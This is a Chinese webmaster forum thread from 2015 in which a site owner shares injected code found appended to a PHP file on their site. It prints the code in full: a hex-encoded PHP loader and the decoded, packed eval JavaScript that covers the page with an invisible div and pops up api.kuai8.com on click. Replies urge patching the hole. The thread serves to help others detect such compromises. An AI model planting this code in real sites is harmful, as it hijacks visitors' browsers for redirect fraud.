百独托管7500 紫田网络超高转化播放器收cps[推荐]速盾CDN 免实名免备防屏蔽阿里云 爆款特卖9.9元封顶提升alexa、IP流量7Q5团队
【腾讯云】中小企福利专场【腾讯云】多款产品1折起高防 随时退换 好耶数据小飞国外网赚带你月入万元炎黄网络4H4G10M 99每月
香港带宽CN2/美国站群优惠中客数据中心 服务器租用联盟系统移动广告平台 中易企业专场腾讯云服务器2.5折九九数据 工信部正规资质
腾讯云新用户大礼包代金券高价收cpa注册量高价展示【腾讯云】2核2G/9.93起租服务器找45互联 随时退换阿里云 短信服务 验证秒达

[技术交流] 网页上被加了恶意代码,找了好久才发现,分享出来大家借鉴 [复制链接]
查看:1849 | 回复:7

32

主题

370

帖子

71

积分

落伍者(一心一意)

Rank: 1

贡献
193
鲜花
1
注册时间
2013-3-21

落伍手机绑定

发表于 2015-11-28 12:04:41 | 显示全部楼层 |阅读模式 来自 中国四川成都
本帖最后由 im2isbest 于 2015-11-28 12:04 编辑

恶意代码表现

网页是静态的html页面,包含有几个js文件以及百度的统计js和百度的分享js
发现多点击几次不同的网页,就会有一个其他的跳转链接被触发,开始是跳转到sogou上
最近几天是被跳转到淘宝的双十一页面,由此可以判断是恶意的跳转,有商业行为的那种了。
后来有跳转到一个什么游戏网站上。

查找问题
认真检查了网页包含的js文件,没有看到任何的恶意代码,百度的统计和分享就算有问题,也不可能跳转到淘宝去的,因此排除js的问题

最后看到文件中引用了php文件,刚开始也是看过这个php文件的,
之所以被刚开始没发现这个php文件的问题,原因如下:
1. 这个php文件的修改日期没有变化过,还是很早之前的日期
2. 这个php文件也不复杂,打开后浏览了前面一点,没有感觉异常,就关闭了。

今天再次查看这个php文件的时候,才注意到在文件的尾部被添加了一段奇怪的代码上去,跟最初的文件不一样了。 由此才发现问题肯定出自这里。

解决办法:
删除这段异常代码,然后重新上传文件后,恶意跳转消失了。

恶意代码程序:

  1. function Class_UC_key($string){$array = strlen ($string);$debuger = '';for($one = 0;$one < $array;$one+=2) {$debuger .= pack ("C",hexdec (substr ($string,$one,2)));}return $debuger;}
  2.              echo(Class_UC_key('6576616c2866756e6374696f6e28702c612c632c6b2c652c72297b653d66756e6374696f6e2863297b72657475726e28633c613f27273a65287061727365496e7428632f612929292b2828633d632561293e33353f537472696e672e66726f6d43686172436f646528632b3239293a632e746f537472696e6728333629297d3b6966282127272e7265706c616365282f5e2f2c537472696e6729297b7768696c6528632d2d29725b652863295d3d6b5b635d7c7c652863293b6b3d5b66756e6374696f6e2865297b72657475726e20725b655d7d5d3b653d66756e6374696f6e28297b72657475726e275c5c772b277d3b633d317d3b7768696c6528632d2d296966286b5b635d29703d702e7265706c616365286e65772052656745787028275c5c62272b652863292b275c5c62272c276727292c6b5b635d293b72657475726e20707d28273320393d5c2731303a2f2f742e752e792f443f483d5c273b37206a2861297b3320623d22223b3320633d612b223d223b3528322e342e683e30297b363d322e342e382863293b352836213d2d31297b362b3d632e683b653d322e342e3828223b222c36293b3528653d3d2d3129653d322e342e683b623d4b28322e342e4c28362c6529297d7d5020627d37206b28612c622c63297b3320643d22223b352863213d73297b643d6c206928286c20692829292e7628292b632a78293b643d223b2031313d222b642e4128297d322e343d612b223d222b422862292b642b223b433d2f227d3720672861297b3320613d612b4528322e46293b3320623d303b3320633d5c27475c273b3528216a28632926262162297b662e492861293b662e4a28293b623d313b6b28632c312c3132297d7d283728642c772c72297b3528286d2e6e2e38285c274d5c27293e3d30292626286d2e6e2e38285c274e5c27293c3029297b642e4f285c273c6f20513d22523a2070253b543a2070253b7a2d553a20563b573a20303b583a20303b593a205a3b2220713d22672839293b223e3c2f6f3e5c27297d537b642e713d3728297b672839297d7d7d2928322c662c39293b272c36322c36352c277c7c646f63756d656e747c7661727c636f6f6b69657c69667c6f66667365747c66756e6374696f6e7c696e6465784f667c6a757374666f7266756e7c7c7c7c7c656e647c77696e646f777c706f704f70656e7c6c656e6774687c446174657c636f6f6b69654765747c636f6f6b69655365747c6e65777c6e6176696761746f727c757365724167656e747c6469767c3130307c6f6e636c69636b7c7c6e756c6c7c6170697c6b756169387c67657454696d657c7c333630303030307c636f6d7c7c746f474d54537472696e677c6573636170657c706174687c6a756d707c656e636f6465555249436f6d706f6e656e747c7469746c657c506f705f6d616d617c77647c6f70656e7c666f6375737c756e6573636170657c737562737472696e677c4d5349457c4f706572617c77726974656c6e7c72657475726e7c7374796c657c6865696768747c656c73657c77696474687c696e6465787c3130303030307c746f707c6c6566747c706f736974696f6e7c66697865647c687474707c657870697265737c272e73706c697428277c27292c302c7b7d2929'));
  3.              exit();       
复制代码


php中看上去是做了编码处理,所以不知道具体含义,放在php中运行,以及结合网页文件是被包含在 script 中的,最后就得到了下面的 javascript 代码。

  1. <script type='text/javascript' language='javascript'>
  2. e val(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 9=\'10://t.u.y/D?H=\';7 j(a){3 b="";3 c=a+"=";5(2.4.h>0){6=2.4.8(c);5(6!=-1){6+=c.h;e=2.4.8(";",6);5(e==-1)e=2.4.h;b=K(2.4.L(6,e))}}P b}7 k(a,b,c){3 d="";5(c!=s){d=l i((l i()).v()+c*x);d="; 11="+d.A()}2.4=a+"="+B(b)+d+";C=/"}7 g(a){3 a=a+E(2.F);3 b=0;3 c=\'G\';5(!j(c)&&!b){f.I(a);f.J();b=1;k(c,1,12)}}(7(d,w,r){5((m.n.8(\'M\')>=0)&&(m.n.8(\'N\')<0)){d.O(\'<o Q="R: p%;T: p%;z-U: V;W: 0;X: 0;Y: Z;" q="g(9);"></o>\')}S{d.q=7(){g(9)}}})(2,f,9);',62,65,'||document|var|cookie|if|offset|function|indexOf|justforfun|||||end|window|popOpen|length|Date|cookieGet|cookieSet|new|navigator|userAgent|div|100|onclick||null|api|kuai8|getTime||3600000|com||toGMTString|escape|path|jump|encodeURIComponent|title|Pop_mama|wd|open|focus|unescape|substring|MSIE|Opera|writeln|return|style|height|else|width|index|100000|top|left|position|fixed|http|expires|'.split('|'),0,{}))
  3. </script>
复制代码



这点代码同样还是看的不怎么懂,但是后面有一段英文能看到几个关键字: api,  kuai8, com,  cookieSet, 3600000, onclick
结合之前打开网页的时候,跳转出了  api.kuai8.com  以及一旦跳转后,下次就不知道什么时候会再次触发可以看出, 一定是 cookieSet 设置了时间,而这个时间应该就是 3600000 了。

写这些代码的人真是太费心思了!!!

上面的代码根据上面的大意就是创建一个空白的 div , 高度为 100000 像素,并且设置cookie,并且通过cookie来判断下次点击是否跳转。

分析结束,希望对大家下次查找问题有帮助。

评分

参与人数 1鲜花 +1 收起 理由
36965648 + 1 落伍有你更精彩!

查看全部评分

回复

使用道具 举报

1466

主题

1万

帖子

41万

积分

落伍者(八仙过海)

服务器安全专家

Rank: 23Rank: 23Rank: 23Rank: 23Rank: 23Rank: 23Rank: 23

贡献
5051
鲜花
84
注册时间
2005-2-26

落伍手机绑定

发表于 2015-11-28 12:10:17 | 显示全部楼层 来自 中国四川成都
治标不治本哦
回复 支持 反对

使用道具 举报

101

主题

6581

帖子

8524

积分

落伍者(三羊开泰)

Rank: 3Rank: 3

贡献
3286
鲜花
8
注册时间
2007-6-17

落伍手机绑定

发表于 2015-11-28 12:29:19 | 显示全部楼层 来自 中国广东东莞
楼上的是大神。
站长IDC大全,落伍IDC大全www.i9w.cn,手机软件,手机游戏站长及应用商务人员群:227866433 阿里云推荐码:N0XE5O
回复 支持 反对

使用道具 举报

41

主题

3589

帖子

5232

积分

落伍者(三羊开泰)

Rank: 3Rank: 3

贡献
700
鲜花
7
注册时间
2010-9-13

技术小组QQ绑定落伍手机绑定

发表于 2015-11-28 14:04:18 | 显示全部楼层 来自 中国山西太原
找到木马不容易 吧
http://www.tianma315.com
彩色二维码标签
不干胶标签
回复 支持 反对

使用道具 举报

191

主题

1万

帖子

1万

积分

落伍者(四季发财)

Rank: 4

贡献
6875
鲜花
9
注册时间
2006-6-16

QQ绑定落伍手机绑定

发表于 2015-11-28 16:02:53 | 显示全部楼层 来自 中国福建福州
代码只要e val解密一下就知道了,关键是这代码是怎么被加上去的。
回复 支持 反对

使用道具 举报

3868

主题

5万

帖子

1万

积分

落伍者(四季发财)

自己理解

Rank: 4

贡献
2784
鲜花
1207
注册时间
2009-9-18

落伍手机绑定

发表于 2015-11-28 16:20:09 | 显示全部楼层 来自 中国福建漳州
堵住漏洞才是真的
LOGO设计 50元 微信amwdhqc 暗号mjj
回复 支持 反对

使用道具 举报

745

主题

3287

帖子

2894

积分

落伍者(两全齐美)

Rank: 2

贡献
463
鲜花
17
注册时间
2010-10-6
发表于 2015-11-28 20:45:41 | 显示全部楼层 来自 中国吉林延边朝鲜族自治州
删除代码是第一步,接下来补漏洞啊
回复 支持 反对

使用道具 举报

101

主题

1万

帖子

1万

积分

落伍者(四季发财)

Rank: 4

贡献
612
鲜花
23
注册时间
2007-12-10

落伍手机绑定

发表于 2015-11-28 21:51:25 | 显示全部楼层 来自 中国安徽合肥
查补漏洞更重要
文件夹写入和执行权限分开
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

论坛客服/商务合作/投诉举报:2171544 (QQ)
落伍者创建于2001/03/14,本站内容均为会员发表,并不代表落伍立场!
拒绝任何人以任何形式在本论坛发表与中华人民共和国法律相抵触的言论!
落伍官方微信:2030286 邮箱:(djfsys@gmail.com|tech@im286.com)
© 2001-2014

浙公网安备 33060302000191号

浙ICP备11034705号 BBS专项电子公告通信管[2010]226号

  落伍法律顾问: ITlaw-庄毅雄

手机版|找回帐号|不能发帖?|Archiver|落伍者

GMT+8, 2024-6-1 23:33 , Processed in 0.151278 second(s), 36 queries , Gzip On.

返回顶部